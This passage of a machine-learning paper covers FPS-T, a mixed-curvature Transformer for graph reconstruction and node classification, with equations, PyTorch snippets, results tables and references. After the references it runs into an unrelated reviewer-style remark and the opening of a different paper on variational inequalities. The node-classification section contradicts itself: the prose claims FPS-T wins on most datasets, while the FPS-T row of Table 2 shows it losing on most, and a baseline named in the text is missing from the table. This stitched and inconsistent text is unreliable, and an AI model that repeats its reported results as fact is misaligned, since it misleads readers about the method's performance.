with conformal factor \( \lambda_{V_j}^\kappa \) at point \( V_j \in \mathfrak{st}_{d'}^{\kappa} \). By concatenating the aggregated results from each attention head, the final outcome of product-stereographic multi-head attention is

\[
\text{MHA}_{\otimes \kappa}(X) = \big\Vert_{h=1}^H \text{Aggregate}_{\kappa_h}(V^h, \alpha^h) \in \mathfrak{st}_d^{\otimes \kappa}, \tag{7}
\]

where \( \kappa_h \) denotes the curvature of the \( h \)-th attention head.

4.3 Wrap-up

For completeness, we fill in the gap of how intermediate steps such as the skip-connection are generalized towards non-zero curvatures, and how representations are passed between Transformer layers with distinct curvatures. First, recall that the vanilla Transformer utilizes residual connections and layer normalization to mitigate vanishing gradients and induce better convergence (Vaswani et al., 2017). To apply these operations to representations in the product-stereographic space, we compute

\[
X_l = \text{MHA}_{\otimes \kappa}(\text{LN}_{\otimes \kappa}(X_{l}^{\text{in}})) \oplus_{\otimes \kappa} X_{l}^{\text{in}}, \quad X_{l}^{\text{out}} = \text{FFN}_{\otimes \kappa}(\text{LN}_{\otimes \kappa}(X_{l})) \oplus_{\otimes \kappa} X_{l}. \tag{8}
\]

Note that while each attention head in stereographic multi-head attention operates on its stereographic model independently, the product-stereographic feed-forward network FFN$_{\otimes \kappa}$, for which we use two stereographic linear layers with an activation in between, fuses representations from distinct geometries and performs interactions between different stereographic models, similarly to previous work (Zhu et al., 2020b; Deng et al., 2023).
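For illustration, below is a minimal sketch of the Einstein-midpoint aggregation of Equation 6 for a single head, given precomputed attention scores α (e.g., from Equation 5). The helper names are ours, and `tan_k`/`arctan_k` come from the earlier stereographic snippet.

```python
def conformal_factor(x, kappa):
    # lambda_x^kappa = 2 / (1 + kappa * ||x||^2)
    return 2.0 / (1.0 + kappa * x.pow(2).sum(-1, keepdim=True))

def mobius_scalar_mul(r, x, kappa, eps=1e-6):
    # Gyrovector scaling: r ⊗_κ x = tan_k(r * arctan_k(||x||)) * x / ||x||
    n = x.norm(dim=-1, keepdim=True).clamp_min(eps)
    return tan_k(r * arctan_k(n, kappa), kappa) * x / n

def aggregate(alpha, V, kappa):
    # Einstein-midpoint aggregation of value points V (n, d')
    # with attention scores alpha (n, n), following Equation 6.
    lam = conformal_factor(V, kappa).squeeze(-1)                 # (n,) lambda_{V_j}
    weights = (alpha * lam) / (alpha * (lam - 1.0)).sum(-1, keepdim=True)
    return mobius_scalar_mul(0.5, weights @ V, kappa)            # 1/2 ⊗_κ (Σ_j w_ij V_j)
```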
Furthermore, each $l$-th Transformer layer operates on a distinct product-stereographic space $\mathfrak{st}_d^{\otimes \kappa^l}$, where $\kappa^l = (\kappa_1^l, \ldots, \kappa_H^l)$ together forms the geometric signature of the layer. For consistency, we assume that the input embeddings lie on the product-stereographic model of the first layer (i.e., $\mathfrak{st}_d^{\otimes \kappa^1}$). For classification tasks where logits are computed, the product-stereographic logit layer operates on the last set of curvatures (i.e., $\mathfrak{st}_d^{\otimes \kappa^L}$, where $L$ denotes the number of Transformer layers). In between layers, representations are translated from $\mathfrak{st}_d^{\otimes \kappa^l}$ to $\mathfrak{st}_d^{\otimes \kappa^{l+1}}$ by assuming a shared tangent space at the origin (i.e., $X_{l+1}^{\text{in}} = (\exp_{0}^{\otimes \kappa^{l+1}} \circ \log_{0}^{\otimes \kappa^l})(X_{l}^{\text{out}})$). Altogether, it is straightforward to see that FPS-T becomes equivalent to the original Transformer as all $\kappa$ approach 0, yet it possesses the capability to deviate from Euclidean geometry whenever doing so leads to better optimization. For all experiments, we initialize all curvatures at zero to demonstrate the practicality of our method, requiring no additional hyperparameter tuning over different curvature combinations.

4.4 Extension to Graph Transformer

To learn from graph-structured data with FPS-T, we borrow the tokenization technique of TokenGT (Kim et al., 2022). Let $G = (V, E)$ be a graph with $N$ nodes in the node-set $V$, $M$ edges in the edge-set $E$, and respective features $X_V \in \mathbb{R}^{N \times d}$, $X_E \in \mathbb{R}^{M \times d}$. We tokenize $G$ into a sequence $X = [X_V, X_E] \in \mathbb{R}^{(N+M) \times d}$ by treating each node and edge as an independent token, and augment the tokens with 1) node identifiers that serve as positional encodings and 2) type identifiers that allow the model to distinguish between node- and edge-tokens. TokenGT feeds this sequence into a vanilla Transformer, an approach proven to pass the 2-dimensional Weisfeiler-Lehman (2-WL) graph isomorphism test and surpass the theoretical expressivity of message-passing GNNs (Kim et al., 2022; Maron et al., 2019). More details on the tokenization procedure can be found in Appendix B (see also the sketch below). In our work, we encode the input sequence through FPS-T instead, such that nodes and edges exchange information globally on the product-stereographic space. As the augmented feature vectors $X$ are initially Euclidean, we assume each token lies within the tangent space at the origin of the product-stereographic model of the first layer, $T_0 \mathfrak{st}_d^{\otimes \kappa^1} \cong \mathbb{R}^{d}$, where $|\kappa^1| = H$. We therefore apply the exponential map to place the tokens on the product-stereographic model via $\exp_{0}^{\otimes \kappa^1}(X)$, the output of which is forwarded through FPS-T.
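As referenced above, a minimal sketch of the TokenGT-style tokenization might look as follows; the function signature and the choice of Laplacian eigenvectors for the node identifiers are illustrative assumptions on our part.

```python
import torch

def tokenize_graph(X_V, X_E, edge_index, P, type_emb):
    # TokenGT-style tokenization (simplified sketch).
    # X_V: (N, d) node features; X_E: (M, d) edge features.
    # edge_index: (2, M) tensor of edge endpoints (u, v).
    # P: (N, d_p) orthonormal node identifiers (e.g., Laplacian eigenvectors).
    # type_emb: (2, d_t) learnable node-token / edge-token type embeddings.
    N, M = X_V.size(0), X_E.size(0)
    # Node token for v: [X_v, P_v, P_v, node-type].
    node_tok = torch.cat([X_V, P, P, type_emb[0].expand(N, -1)], dim=-1)
    # Edge token for (u, v): [X_e, P_u, P_v, edge-type].
    u, v = edge_index
    edge_tok = torch.cat([X_E, P[u], P[v], type_emb[1].expand(M, -1)], dim=-1)
    return torch.cat([node_tok, edge_tok], dim=0)  # (N + M, d + 2*d_p + d_t)
```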
4.5 Cost Linearization of Stereographic Attention

One drawback of the graph tokenization method above is that its computational cost becomes intractable when encoding large graphs. As computing the attention score matrix takes time and memory quadratic in the sequence length, a graph with $N$ nodes and $M$ edges incurs an asymptotic cost of $O((N + M)^2)$, which can be $O(N^4)$ for dense graphs.

Fortunately, there exist various advancements for making Transformers more efficient (Tay et al., 2022; Kitaev et al., 2020; Choromanski et al., 2020; Wang et al., 2020; Xiong et al., 2021; Cho et al., 2022). In linearized attention (Katharopoulos et al., 2020), it is shown that the Euclidean attention score $\langle Q_i, K_j \rangle$ can be approximated by the product of kernel functions $\phi(Q_i)\phi(K_j)^\top$, where $\phi(X) = \text{ELU}(X) + 1$. For stereographic attention (Equation 5), computing dot-products on the tangent space of the origin allows us to extend this kernelization to FPS-T. Let $\tilde{Q}_i = \text{PT}_{V_i \rightarrow 0}(Q_i)$ and $\tilde{K}_j = \text{PT}_{V_j \rightarrow 0}(K_j)$ be the tangent vectors at the origin prior to taking the dot-product. By applying this kernelization to stereographic attention, we can rewrite the stereographic aggregation (Equation 6) as

$$
\frac{1}{2} \otimes_{\kappa} \left( \sum_{j=1}^{n} \frac{\langle \tilde{Q}_i, \tilde{K}_j \rangle_0 \, \lambda_{V_j}^{\kappa}}{\sum_{k=1}^{n} \langle \tilde{Q}_i, \tilde{K}_k \rangle_0 \, (\lambda_{V_k}^{\kappa} - 1)} V_j \right) \approx \frac{1}{2} \otimes_{\kappa} \left[ \frac{\phi(\tilde{Q}) \left( \phi'(\tilde{K})^\top \tilde{V} \right)}{\phi(\tilde{Q}) \left( \phi'(\tilde{K})^\top \mathbf{1} \right)} \right]_i, \tag{9}
$$

where $\phi'(\tilde{K})_i = \phi(\tilde{K})_i (\lambda_{V_i}^{\kappa} - 1)$ and $\tilde{V}_i = \frac{\lambda_{V_i}^{\kappa}}{\lambda_{V_i}^{\kappa} - 1} V_i$. This approximation enables FPS-T to encode graphs with $O(N + M)$ cost, matching the complexity of message-passing GCNs (Wu et al., 2020) while taking the non-Euclidean geometry into account. In Appendix C, we empirically verify this asymptotic cost and also find that the additional cost of the Riemannian operations in FPS-T is mostly dominated by pre-existing Transformer operations when encoding large networks. In the upcoming experiments, we use the kernelized approach for FPS-T and find that the approximation performs well in practice.

Table 1: Synthetic graph reconstruction results in average distortion (lower is better). The best FPS-T configuration and its learned curvatures are well-aligned with the geometry of the input graph.

| Model | Space | TREE | SPHERE | TORUS | RING OF TREES |
|----------------|-------------|----------|----------|----------|---------------|
| TOKENGT | $\mathbb{E}^{10}$ | 0.04363 | 0.04023 | 0.07172 | 0.05553 |
| | $\mathbb{S}^5 \times \mathbb{E}^5$ | 0.04357 | 0.04139 | 0.07167 | 0.05546 |
| FPS-T (ours) | $\mathfrak{st}_{\kappa_1}^{10}$ | **0.00072** | **0.02176** | **0.06415** | **0.03393** |
| | $\mathfrak{st}_{\kappa_1}^5 \times \mathfrak{st}_{\kappa_2}^5$ | 0.00105 | 0.02206 | **0.06135** | **0.01630** |
| Best FPS-T curvatures | | (-1.219) | (+0.0629) | (+1.308, +0.2153) | (+0.3241, -3.314) |

Figure 3: Illustration of the geometric graphs used in our synthetic graph reconstruction experiment: (a) TREE, (b) SPHERE, (c) TORUS, (d) RING OF TREES.

5 EXPERIMENTS

We first evaluate FPS-T on synthetic geometric graph reconstruction (e.g., tree or spherical graphs) to verify whether our approach learns curvatures that best fit the input graph. We also benchmark existing graph reconstruction and node classification datasets to empirically demonstrate the benefit of capturing long-range interactions under mixed-curvature spaces in real-world settings.

5.1 GRAPH RECONSTRUCTION

**Datasets.**
For synthetic graph reconstruction, we generate four types of graphs for which the suitable geometry is known a priori — TREE ($\mathbb{H}$), SPHERE ($\mathbb{S}$), TORUS ($\mathbb{S} \times \mathbb{S}$), and RING OF TREES ($\mathbb{S} \times \mathbb{H}$). Example illustrations of the synthetic graphs can be found in Figure 3. We then evaluate FPS-T on four real-world networks: WEB-EDU (Gleich et al., 2004) is a web-page network under the .edu domain connected by hyperlinks; POWER (Watts & Strogatz, 1998) is a network that models the electrical power grid of the western US; BIO-WORM (Cho et al., 2014) is a genetics network of the C. elegans worm; FACEBOOK (Leskovec & Mcauley, 2012) is a social network. Further details on the datasets, such as sectional curvature statistics of the networks, can be found in Appendix D.

**Training.** The goal of graph reconstruction is to learn continuous node representations of the given graph that preserve the edge connectivity structure through distances in the feature space. Let $h_u$ denote the encoded representation of node $u \in V$ given a graph $G = (V, E)$. For synthetic graph reconstruction, we train FPS-T and TOKENGT by minimizing the graph distortion (Gu et al., 2019):

$$
L(h, G) = \sum_{(u,v) \in V \times V, u \neq v} \left| \left( \frac{d(h_u, h_v)}{d_G(u, v)} \right)^2 - 1 \right|,
$$

where $d(h_u, h_v)$ denotes the distance between $h_u$ and $h_v$ in the representation space, and $d_G(u, v)$ equals the shortest-path distance between nodes $u$ and $v$ on the graph $G$. Both methods use a single layer with 1 or 2 attention heads and a combined latent dimension of 10.

| Dataset | WEB-EDU | POWER | FACEBOOK | BIO-WORM |
|---------|---------|-------|----------|----------|
| Avg. Curvature | -0.63 | -0.28 | -0.08 | -0.03 |
| MLP | 83.24±1.32 | 83.89±4.02 | 50.64±15.12 | 73.34±20.85 |
| GCN | 79.95±0.23 | 98.25±0.02 | 78.99±0.29 | 93.32±1.06 |
| GAT | 88.86±0.36 | 99.03±0.01 | 82.81±0.25 | 97.76±0.03 |
| SAGE | 86.34±0.31 | 97.58±0.14 | 81.01±0.26 | 96.86±0.06 |
| SGC | 78.78±0.12 | 97.69±0.05 | 74.69±0.36 | 89.73±0.59 |
| TOKENGT | 89.45±0.06 | 99.10±0.00 | 84.71±0.02 | 97.82±0.02 |
| HGCN | 80.13±0.31 | 96.82±0.08 | 74.35±5.39 | 86.96±0.30 |
| HGNN | 83.64±0.26 | 97.85±0.05 | 78.74±0.58 | 90.97±1.06 |
| HAT | 90.21±0.36 | 93.86±0.34 | 80.09±0.20 | 93.58±0.42 |
| \( \kappa \)-GCN | 55.34±35.88 | 98.23±0.09 | 20.80±20.69 | 84.16±13.67 |
| \( Q \)-GCN | 80.34±0.07 | 97.87±0.01 | 76.33±0.01 | 96.15±0.01 |
| FPS-T | 99.10±0.01 | 99.32±0.01 | 86.16±0.10 | 98.19±0.03 |

Figure 4: **Left:** Real-world graph reconstruction results. We run each method under 5 random seeds and report the average mAP with 95% confidence intervals. **Right:** Test mAP (Y-axis) of FPS-T and TOKENGT on WEB-EDU with decreasing model size (X-axis; by decreasing the latent dimension). Using mixed-curvature spaces can be more parameter-efficient in preserving graph structures.

For real-world graph reconstruction, we instead minimize a loss function that aims to preserve local connections, as computing all pairwise shortest-path distances becomes computationally intractable for large networks:

$$
L(h, G) = -\sum_{(u,v) \in E} \log \frac{e^{-d(h_u,h_v)}}{\sum_{v' \in E(u)} e^{-d(h_u,h_{v'})}}.
$$

Here, \( E(u) \) denotes the set of non-neighbors of node \( u \).
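As a small worked example, the distortion objective above can be computed as in the sketch below; the function names are ours, and `dist_fn` can be any representation-space distance (e.g., the stereographic `dist` from the earlier snippet).

```python
import torch

def distortion_loss(h, d_G, dist_fn):
    # h: (N, d) node embeddings; d_G: (N, N) shortest-path distance matrix;
    # dist_fn: distance on the representation space.
    N = h.size(0)
    i, j = torch.triu_indices(N, N, offset=1)      # all unordered pairs u != v
    d_emb = dist_fn(h[i], h[j])                    # distances in embedding space
    return (((d_emb / d_G[i, j]) ** 2) - 1.0).abs().sum()
```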
In addition to TOKENGT, we compare FPS-T against baselines including Euclidean (GCN (Kipf & Welling, 2016), GAT (Veličković et al., 2017), SAGE (Hamilton et al., 2017), SGC (Wu et al., 2019)), hyperbolic (HGCN (Chami et al., 2019), HGNN (Liu et al., 2019), HAT (Zhang et al., 2021)), and mixed-curvature (\( \kappa \)-GCN (Bachmann et al., 2020), \( Q \)-GCN (Xiong et al., 2022)) message passing-based GCNs. For a fair comparison, we set the number of layers to one and the latent dimension to 16 for all models. We train all models for 10k epochs using the Adam optimizer with learning rate \( 1e^{-2} \). The node features are given as one-hot encodings with additional random noise, following Xiong et al. (2022). We defer details on the hyperparameters of the baseline methods to Appendix E.

**Results.** Table 1 reports the synthetic graph reconstruction results in average graph distortion, as well as the curvatures learned by FPS-T. As expected, FPS-T consistently outperforms its Euclidean counterpart on all four graphs, owing to their highly non-Euclidean structures. Despite being initialized at zero, the learnable curvatures in FPS-T converge towards values that intuitively match the input graph: for RING OF TREES, FPS-T with two attention heads converges towards one positive and one negative curvature, outperforming the single-head variant. Next, the left table in Figure 4 shows the average sectional curvature of each real-world network and the corresponding graph reconstruction results in mean average precision (mAP), which measures the average ratio of nearest points that are actual neighbors of each node. We find that FPS-T shows significant performance gains on all four networks compared to all baselines, including the Euclidean TOKENGT. Specifically, FPS-T shows a 10.5% gain in mAP over TOKENGT on WEB-EDU, which has an average sectional curvature of -0.63, showing that performing attention on the non-Euclidean product-stereographic space is especially effective when encoding graphs containing many non-zero sectional curvatures. Note that non-Euclidean spaces are theoretically known to embed complex structures well in low dimensions, while Euclidean spaces require a large number of dimensions to attain reasonable precision (Sala et al., 2018). Based on this observation, we test whether FPS-T enjoys better parameter efficiency than TOKENGT by training both models with decreasing latent dimensions in \{16, 12, 8, 4\}. In the right plot of Figure 4, we report the mAP scores of TOKENGT and FPS-T on the WEB-EDU network after training with a decreasing number of parameters. We observe that our approach of incorporating mixed-curvature spaces consistently obtains low-distortion embeddings in a more parameter-efficient manner, outperforming TOKENGT with \( d = 16 \) using half its model size.

Table 2: Node classification results. We run each method under 10 different random seeds and report the average F1 scores with 95% confidence intervals and average rankings across all datasets.

| Dataset | TEXAS | CORNELL | WISCONSIN | ACTOR | AIRPORT | CITESEER | PUBMED | CORA | Avg. Rank |
|---------|-------|---------|-----------|-------|---------|----------|--------|------|-----------|
| H(G) | 0.11 | 0.13 | 0.20 | 0.22 | 0.72 | 0.74 | 0.80 | 0.81 | |
| MLP | 70.54±3.00 | 58.38±4.04 | 81.20±1.87 | 33.62±0.55 | 54.05±1.78 | 52.58±1.97 | 67.17±0.91 | 52.44±1.08 | 8.25 |
| GCN | 57.84±1.62 | 47.84±1.77 | 45.40±2.62 | 27.09±0.36 | 92.00±0.63 | 71.38±0.43 | 78.37±0.26 | 80.40±0.53 | 7.38 |
| GAT | 59.46±1.12 | 55.14±1.80 | 46.20±2.30 | 27.43±0.23 | 92.35±0.36 | 71.70±0.29 | 78.14±0.31 | 82.29±0.46 | 6.13 |
| SAGE | 68.38±3.54 | 70.54±2.01 | 78.40±0.52 | 36.87±0.50 | 93.21±0.57 | 70.58±0.42 | 77.31±0.59 | 78.88±0.87 | 5.13 |
| SGC | 57.57±2.96 | 52.97±2.87 | 46.40±2.01 | 27.14±0.46 | 90.48±1.01 | 72.11±0.38 | 75.11±1.27 | 79.68±0.65 | 8.25 |
| TOKENGT | 88.65±2.06 | 71.62±2.13 | 83.00±0.65 | 36.59±0.89 | 95.90±0.39 | 71.23±0.51 | 78.93±0.27 | 81.42±0.79 | 2.50 |
| HGNN | 54.59±3.93 | 55.68±1.80 | 55.60±2.53 | 28.89±0.16 | 92.47±0.63 | 69.92±0.60 | 75.67±0.99 | 80.00±0.85 | 7.00 |
| HAT | 50.81±3.60 | 52.70±1.42 | 54.60±2.68 | 29.09±0.19 | 90.55±0.71 | 69.82±0.53 | 76.72±0.86 | 79.30±0.51 | 8.75 |
| κ-GCN | 82.16±2.52 | 70.54±1.67 | 81.80±1.36 | 38.34±0.26 | 92.88±0.57 | 68.14±0.53 | 77.50±0.42 | 79.81±0.58 | 4.38 |
| Q-GCN | 56.22±4.38 | 55.68±5.59 | 46.60±2.41 | 26.39±0.60 | 82.58±3.70 | 54.06±4.45 | 68.61±3.05 | 73.70±0.69 | 10.3 |
| FPS-T | 51.35±3.44 | 55.95±2.85 | 52.80±2.20 | 28.18±0.55 | 91.39±1.05 | 66.15±0.45 | 77.13±0.59 | 79.63±0.57 | 8.25 |

5.2 NODE CLASSIFICATION

**Datasets.** For node classification, we experiment on eight different networks: three WebKB networks (TEXAS, CORNELL, WISCONSIN) that connect web-pages via hyperlinks (Craven et al., 1998), a co-occurrence network from Wikipedia pages related to English films (ACTOR) (Tang et al., 2009), three citation networks (CITESEER, PUBMED, CORA) (Sen et al., 2008), and an airline network (AIRPORT) (Chami et al., 2019). These networks are chosen to test our approach under a wide spectrum of graph homophily $H(G)$, which measures the ratio of edges that connect nodes sharing the same label (Zhu et al., 2020a). In other words, a heterophilic graph with small graph homophily requires capturing long-range interactions for proper labeling, which is naturally difficult for message passing-based approaches with small receptive fields. More detailed statistics on the networks can be found in Appendix D.

**Training.** For all methods, we fix the embedding dimension to 16 and train each model to minimize the cross-entropy loss using the Adam optimizer with a learning rate of $1e^{-2}$. For models with learnable curvatures (i.e., HGCN, κ-GCN, and FPS-T), we use a learning rate of $1e^{-4}$ for the curvatures. The optimal number of layers, activation function, dropout rate, and weight decay of each method are chosen via grid search on each dataset. Details on the hyperparameter search space and dataset splits can be found in Appendix E.2.

**Results.** Table 2 shows the results of node classification. Overall, our method attains the best accuracy on 6 out of 8 datasets, showing that FPS-T is effective across networks with various levels of graph homophily. In the case of heterophilic networks, we find that the small receptive fields of message-passing GCNs are extremely inadequate, often being outperformed by a simple MLP that completely ignores the graph connectivity. On the other hand, FPS-T consistently outperforms the MLP as well as the GCN baselines, due to its ability to exchange information across long distances via global attention.
It also significantly outperforms TOKENGT by 8.3% on ACTOR, showing that adjusting the geometry towards non-Euclidean can further enhance predictive performance. In homophilic networks where message-passing is more well-suited, FPS-T shows competitive performance against the GCN baselines. This is expected, as FPS-T enjoys the same capacity as TOKENGT to mimic any order-2 equivariant basis (Kim et al., 2022), which includes local message-passing, through attention score computation.

6 CONCLUSION

We propose FPS-T, a natural generalization of the Transformer architecture towards mixed-curvature spaces with learnable curvatures. When combined with the graph tokenization technique of Kim et al. (2022), our model can embed graphs with less distortion and higher parameter efficiency than its Euclidean counterpart by operating on the product-stereographic model. We also show that our model outperforms existing hyperbolic and mixed-curvature message-passing GCN baselines on node classification via global attention that can capture long-range interactions. By linearizing the cost of self-attention through a kernelized approximation, FPS-T runs in cost linear in the number of nodes and edges, allowing practical use on large-scale networks. For future work, we plan to extend towards heterogeneous manifolds (Giovanni et al., 2022) with input-dependent sectional curvatures, and to optimize Riemannian operations for better stability and efficiency under finite precision. As we propose a foundational generalization of the Transformer architecture, investigating which geometry best suits various tasks in the NLP and CV domains would also be an interesting direction.

REFERENCES

Uri Alon and Eran Yahav. On the bottleneck of graph neural networks and its practical implications. *arXiv preprint arXiv:2006.05205*, 2020.

Gregor Bachmann, Gary Bécigneul, and Octavian Ganea. Constant curvature graph convolutional networks. In *International Conference on Machine Learning*, pp. 486–496. PMLR, 2020.

Tom Brown, Benjamin Mann, Nick Ryder, Melanie Subbiah, Jared D Kaplan, Prafulla Dhariwal, Arvind Neelakantan, Pranav Shyam, Girish Sastry, Amanda Askell, et al. Language models are few-shot learners. *Advances in Neural Information Processing Systems*, 33:1877–1901, 2020.

Chen Cai and Yusu Wang. A note on over-smoothing for graph neural networks. *arXiv preprint arXiv:2006.13318*, 2020.

Ines Chami, Zhitao Ying, Christopher Ré, and Jure Leskovec. Hyperbolic graph convolutional neural networks. *Advances in Neural Information Processing Systems*, 32, 2019.

Ara Cho, Junha Shin, Sohyun Hwang, Chanyoung Kim, Hongseok Shim, Hyojin Kim, Hanhae Kim, and Insuk Lee. WormNet v3: a network-assisted hypothesis-generating server for Caenorhabditis elegans. *Nucleic Acids Research*, 42(W1):W76–W82, 2014. doi: 10.1093/nar/gku367. URL https://doi.org/10.1093/nar/gku367.

Sungjun Cho, Seonwoo Min, Jinwoo Kim, Moontae Lee, Honglak Lee, and Seunghoon Hong. Transformers meet stochastic block models: Attention with data-adaptive sparsity and cost. *arXiv preprint arXiv:2210.15541*, 2022.

Krzysztof Choromanski, Valerii Likhosherstov, David Dohan, Xingyou Song, Andreea Gane, Tamas Sarlos, Peter Hawkins, Jared Davis, Afroz Mohiuddin, Lukasz Kaiser, et al. Rethinking attention with performers. *arXiv preprint arXiv:2009.14794*, 2020.

Mark Craven, Andrew McCallum, Dan PiPasquo, Tom Mitchell, and Dayne Freitag. Learning to extract symbolic knowledge from the world wide web.
Technical report, Carnegie Mellon University, School of Computer Science, 1998.

Calin Cruceru, Gary Bécigneul, and Octavian-Eugen Ganea. Computationally tractable Riemannian manifolds for graph embeddings. In *Proceedings of the AAAI Conference on Artificial Intelligence*, volume 35, pp. 7133–7141, 2021.

Michaël Defferrard, Martino Milani, Frédérick Gusset, and Nathanaël Perraudin. DeepSphere: a graph-based spherical CNN. In *International Conference on Learning Representations*, 2020. URL https://openreview.net/forum?id=B1e3OlStPB.

Cheng Deng, Fan Xu, Jiaxing Ding, Luoyi Fu, Weinan Zhang, and Xinbing Wang. FMGNN: Fused manifold graph neural network. *arXiv preprint arXiv:2304.01081*, 2023.

Jacob Devlin, Ming-Wei Chang, Kenton Lee, and Kristina Toutanova. BERT: Pre-training of deep bidirectional transformers for language understanding. *arXiv preprint arXiv:1810.04805*, 2018.

Alexey Dosovitskiy, Lucas Beyer, Alexander Kolesnikov, Dirk Weissenborn, Xiaohua Zhai, Thomas Unterthiner, Mostafa Dehghani, Matthias Minderer, Georg Heigold, Sylvain Gelly, et al. An image is worth 16x16 words: Transformers for image recognition at scale. *arXiv preprint arXiv:2010.11929*, 2020.

Vijay Prakash Dwivedi and Xavier Bresson. A generalization of transformer networks to graphs. *arXiv preprint arXiv:2012.09699*, 2020.

Vijay Prakash Dwivedi, Ladislav Rampášek, Michael Galkin, Ali Parviz, Guy Wolf, Anh Tuan Luu, and Dominique Beaini. Long range graph benchmark. *Advances in Neural Information Processing Systems*, 35:22326–22340, 2022.

Jiarui Feng, Yixin Chen, Fuhai Li, Anindya Sarkar, and Muhan Zhang. How powerful are k-hop message passing graph neural networks. *arXiv preprint arXiv:2205.13328*, 2022.
RsztjXcvUf
It seems to me that equation (14) is one of the crucial steps: it avoids Lemma 1 in Yang et al., where the gap is bounded as a function of the distance to the optimal VI solution. However, I struggle to see where/how exactly the improvements were achieved.
A Primal-Dual Approach to Solving Variational Inequalities with General Constraints

Tatjana Chavdarova∗, University of California, Berkeley. [email protected]
Matteo Pagliardini, University of California, Berkeley & EPFL. [email protected]
Tong Yang∗, Carnegie Mellon University. [email protected]
Michael I. Jordan, University of California, Berkeley. [email protected]

∗Equal contribution. Source code: https://github.com/Chavdarova/I-ACVI.

Abstract

Yang et al. (2023) recently showed how to use first-order gradient methods to solve general variational inequalities (VIs) under a limiting assumption that analytic solutions of specific subproblems are available. In this paper, we circumvent this assumption via a warm-starting technique where we solve subproblems approximately and initialize variables with the approximate solution found at the previous iteration. We prove the convergence of this method and show that the gap function of the last iterate of the method decreases at a rate of $O(\frac{1}{\sqrt{K}})$ when the operator is $L$-Lipschitz and monotone. In numerical experiments, we show that this technique can converge much faster than its exact counterpart. Furthermore, for the cases when the inequality constraints are simple, we introduce an alternative variant of ACVI and establish its convergence under the same conditions. Finally, we relax the smoothness assumptions in Yang et al., yielding, to our knowledge, the first convergence result for VIs with general constraints that does not rely on the assumption that the operator is $L$-Lipschitz.

1 Introduction

We study variational inequalities (VIs), a general class of problems that encompasses both equilibria and optima. The general (constrained) VI problem involves finding a point $x^* \in \mathcal{X}$ such that:

$$\langle x - x^*, F(x^*) \rangle \geq 0, \quad \forall x \in \mathcal{X}, \tag{cVI}$$

where $\mathcal{X}$ is a subset of the Euclidean $n$-dimensional space $\mathbb{R}^n$, and where $F : \mathcal{X} \mapsto \mathbb{R}^n$ is a continuous map. VIs generalize standard constrained minimization problems, where $F$ is a gradient field $F \equiv \nabla f$; by allowing $F$ to be a general vector field, they also include problems such as finding equilibria in zero-sum games and general-sum games (Cottle & Dantzig, 1968; Rockafellar, 1970). This increased expressivity underlies their practical relevance to a wide range of emerging applications in machine learning, such as (i) multi-agent games (Goodfellow et al., 2014; Vinyals et al., 2017), (ii) robustification of single-objective problems, which yields min-max formulations (Szegedy et al., 2014; Mazuelas et al., 2020; Christiansen et al., 2020; Rothenhäusler et al., 2018), and (iii) statistical approaches to modeling complex multi-agent dynamics in stochastic and adversarial environments. We refer the reader to (Facchinei & Pang, 2003; Yang et al., 2023) for further examples. Such generality comes, however, at a price in that solving for equilibria is notably more challenging than solving for optima. In particular, as the Jacobian of $F$ is not necessarily symmetric, we may have rotational trajectories or limit cycles (Korpelevich, 1976; Hsieh et al., 2021). Moreover, in sharp contrast to standard minimization, the last iterate can be quite far from the solution even though the average iterate converges to the solution (Chavdarova et al., 2019). This has motivated recent efforts to study specifically the convergence of the last iterate produced by gradient-based methods.
Thus, herein, our focus and discussions refer to the last iterate. Recent work has focused primarily on solving VIs in two settings for the domain $\mathcal{X}$: (i) the unconstrained setting where $\mathcal{X} \equiv \mathbb{R}^n$ (Golowich et al., 2020b; Chavdarova et al., 2023; Gorbunov et al., 2022a; Bot et al., 2022), and (ii) the constrained setting with projection-based methods (Tseng, 1995; Daskalakis et al., 2018; Diakonikolas, 2020; Nemirovski, 2004; Mertikopoulos et al., 2019; Cai et al., 2022). The latter approach assumes that the projection is "simple," in the sense that this step does not require gradient computation. This holds, for example, for inequality constraints of the form $x \leq \tau$ where $\tau$ is some constant, in which case fast operations such as clipping suffice. However, as is the case in constrained minimization, the constraint set—denoted herein by $\mathcal{C} \subseteq \mathcal{X}$—is, in the general case, an intersection of finitely many inequalities and linear equalities:

$$\mathcal{C} = \{ x \in \mathbb{R}^n \mid \varphi_i(x) \leq 0, i \in [m], \ Cx = d \}, \tag{CS}$$

where each $\varphi_i : \mathbb{R}^n \mapsto \mathbb{R}$, $C \in \mathbb{R}^{p \times n}$, and $d \in \mathbb{R}^p$. Given a general CS (without assuming additional structure), implementing the projection requires second-order methods, which quickly become computationally prohibitive as the dimension $n$ increases. If the second-order derivative computation is approximated, the derived convergence rates are multiplied by an additional factor; thus, the resulting rate of convergence may not match the known lower bound (Golowich et al., 2020a; Cai et al., 2022). This motivates a third thread of research, focusing on projection-free methods for the constrained VI problem, where the update rule does not rely on the projection operator. This is the case we focus on in this paper. There has been significant work on developing second-order projection-free methods for the formulation in cVI; we refer the interested reader to (Chapter 7, Nesterov & Nemirovski, 1994) and (Chapter 11, Facchinei & Pang, 2003, vol. 2) for examples. We remark that the seminal mirror-descent and mirror-prox methods (Nemirovski & Yudin, 1983; Beck & Teboulle, 2003; Nemirovski, 2004) (see App. A.5) exploit a certain structure of the domain and avoid the projection operator, but cannot be applied to a general CS. In recent work, Yang et al. (2023) presented a first-order method, referred to as the ADMM-based Interior Point Method for Constrained VIs (ACVI), for solving the cVI problem with general constraints. ACVI combines path-following interior point (IP) methods and primal-dual methods. Regarding the latter, it generalizes the alternating direction method of multipliers (ADMM) (Glowinski & Marroco, 1975; Gabay & Mercier, 1976), an algorithmic paradigm that is central to large-scale optimization (Boyd et al., 2011; Tibshirani, 2017)—see (Yang et al., 2023) and App. A.1—but which has been little explored in the cVI context. At a high level, ACVI has two nested loops: (i) the outer loop smoothly decreases the weight $\mu_i$ of the inequality constraints as in IP methods, whereas (ii) the inner loop performs a primal-dual update (for a fixed $\mu_i$) as follows:

- solve a subproblem whose main (primal) variable $x_j^i$ aims to satisfy the equality constraints,
- solve a subproblem whose main (primal) variable $y_j^i$ aims to satisfy the inequality constraints,
- update the dual variable $\lambda_j^i$.
